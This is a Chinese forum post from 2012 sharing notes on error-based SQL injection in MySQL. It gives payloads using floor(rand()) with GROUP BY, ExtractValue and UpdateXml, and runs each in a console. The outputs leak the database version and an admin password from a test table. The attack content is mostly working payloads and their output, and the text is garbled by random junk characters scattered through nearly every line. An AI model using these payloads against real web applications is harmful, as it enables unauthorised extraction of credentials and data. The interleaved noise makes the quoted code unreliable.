放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。; T# _2 [' L9 M5 H3 S
实际测试环境:/ r4 I* c# ~9 P% R' ?- C R
$ p0 |% f) i6 ?
$ B% ?6 p! F r" w" W3 Vmysql> show tables;
2 W7 ` Z M- V# J+ K4 H/ z- {5 K+----------------+
: Q ~6 Q% Q6 k8 y" ~$ Y. b| Tables_in_test |1 O! {8 j3 ^: N, k4 r0 A5 L
+----------------+$ c$ I- u: z8 n( u/ u" y
| admin |9 f0 u' j+ M i/ u
| article |2 w! N7 b1 \ ?9 C* G& G9 }# H0 Q8 X
+----------------+# N# d# W6 a* f0 C1 H
: n% C* r3 Z& \' d/ a2 S
! u% @0 v3 R$ Y1 E+ w7 m9 k2 S! Y
, H! }. ^$ G. U; Omysql> describe admin;
/ F! }+ x3 L9 {, B+-------+------------------+------+-----+---------+----------------+) T+ l' ?" ~" P7 d% k
| Field | Type | Null | Key | Default | Extra |+ m( z, ]6 _6 |# U
+-------+------------------+------+-----+---------+----------------+
- c$ p+ Y5 c' T+ t& g8 N| id | int(10) unsigned | NO | PRI | NULL | auto_increment | c. W7 E7 h3 F5 E4 f! U
| user | varchar(50) | NO | | NULL | |
; y. R4 [1 n$ N5 D; D$ `# m8 _& b& ^7 x| pass | varchar(50) | NO | | NULL | |2 l; x. S7 y5 K/ P
+-------+------------------+------+-----+---------+----------------+1 L% q' k( `8 K; C/ j
# u# E4 ^2 }1 G- W
' s4 w) i! E- ^3 G4 W % |+ E( ?& _' r9 A9 s
mysql> describe article;
2 s* }6 r3 q# g+---------+------------------+------+-----+---------+----------------+% t1 p, g" ?" U. o& y$ ~% A2 J
| Field | Type | Null | Key | Default | Extra |( F$ n ?" p4 V. H B' w. W* E
+---------+------------------+------+-----+---------+----------------+5 _8 S$ c' x0 y2 D; ^; q9 q, l
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |% D. e" L, C) `6 W: C
| title | varchar(50) | NO | | NULL | |( P# [' S4 |, [- m+ E
| content | varchar(50) | NO | | NULL | |
) `# q9 k& y/ ^7 p& R* G+---------+------------------+------+-----+---------+----------------+- ]9 `! \$ J& |# G: o1 k" T
1、通过floor报错
$ z. n6 d v6 J3 o$ c可以通过如下一些利用代码9 n' T) o A& u5 w! U
+ v' A3 j8 \- T- R" c
/ X9 G1 P) I) Sand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
' {5 m4 g4 J! ~* |, G: ]& nfrom information_schema.tables group by x)a);2 O ]/ E6 u3 h: Q! D# V
) l/ H2 h) J9 y& n
+ N8 X1 a$ C# S$ G% jand (select count(*) from (select 1 union select null union select !1)x* ?) y; ^2 }1 r1 V: I
group by concat((select table_name from information_schema.tables limit 1),
8 O, q; K: d/ z3 L( ?floor(rand(0)*2)));
4 L9 m& `+ C2 [0 {, l举例如下:6 B( A2 ~- Q; C
首先进行正常查询:* T- |! Q. c& e" V8 N# }
5 ]8 }5 a* o2 Q% Omysql> select * from article where id = 1;
& [0 n0 j: R) p* f( P+----+-------+---------+' [1 i. }' g# h
| id | title | content |
+ N% t; e. D( \ j% C+----+-------+---------+2 N% Z5 s+ @; I; |1 ?- ?7 k
| 1 | test | do it |
) Y7 B! N- j0 c7 d t/ N+----+-------+---------+
1 }1 J+ `9 q8 z假如id输入存在注入的话,可以通过如下语句进行报错。
. j& m6 M1 F' n8 B: u ( h; z- X5 O, s7 Y5 Q. I
4 f; b8 O1 m7 Q0 X% Bmysql> select * from article where id = 1 and (select 1 from) {2 _( o& b. g# t
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);* Y2 `( J# A* I
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' `1 h1 k3 T& K+ @0 V+ X$ }
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 L7 P" {. r1 Z! e& {/ h' D例如我们需要查询管理员用户名和密码:
8 s* X, ~2 Z6 v$ Y3 gMethod1:
9 F: M$ p! j5 A/ `6 P3 e
$ h3 o% r0 _+ Y( P
0 A" F7 l( x# X6 P0 T% tmysql> select * from article where id = 1 and (select 1 from
+ q) P+ \7 K8 A8 m4 @(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
; f$ r0 g/ J/ Z6 jfrom information_schema.tables group by x)a);0 p9 \) G; C$ w4 W: v
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
% L5 |( F. u0 {, N4 D& [Method2:
i s0 W5 V& Z) `2 O9 {- M& K
: w& U4 g* b5 a+ P 4 ?# n L0 n4 x1 p
mysql> select * from article where id = 1 and (select count(*)
; z7 ~- C1 @4 g3 I1 U0 rfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
( p) v; h3 F5 K5 { pfloor(rand(0)*2))); w( p" i6 f$ p3 z+ y; v
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
7 X( {) O% P5 p' H% W. [: o2、ExtractValue
+ M$ u: n1 ^* c8 b6 u. M测试语句如下- R9 V3 S t' u; f7 {3 c5 e d
# R# {" a- U* v5 q# c# _
. j: Q2 ~4 R+ Hand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
" w4 i7 m; y7 \实际测试过程& M' j3 g2 g3 z/ I" N
9 j# }- A2 A) @ Y
+ K5 F1 @4 m% |% r7 h5 Z, hmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
8 M: `. Q# u/ _; y+ j(select pass from admin limit 1)));--
$ F g! d' f1 d( Z: M! F, y' o- A4 ^ERROR 1105 (HY000): XPATH syntax error: '\admin888'9 |, {0 p8 u' g' D7 c
3、UpdateXml
$ `& }1 n) Z; s% J% w6 X测试语句( {( v% q' X% l( p8 A
/ X7 ^, j1 s1 q$ `% u5 e0 p7 |
( @$ z$ b0 s Q2 x" v
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))( ]3 y+ h" i; e/ x6 E0 a7 J
实际测试过程' m7 Y- l0 O6 ^1 o" p5 }7 J/ ?3 q
* z! ]7 f- _; f$ Z9 u
- G9 f, V. u2 \2 Lmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
0 y2 Q$ q( @) X ?2 m0 E(select pass from admin limit 1),0x5e24),1));8 T: E7 t% F( Y- f
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
- t* U/ o! k) J, U! `" gAll, thanks foreign guys.
9 k* ^! N/ n, c7 ~; [4 B 1 t5 q3 k6 W! d
' u, g' T( S }6 `1 h1 T
|
发表于 2012-12-10 10:28:51
收藏
分享
支持
反对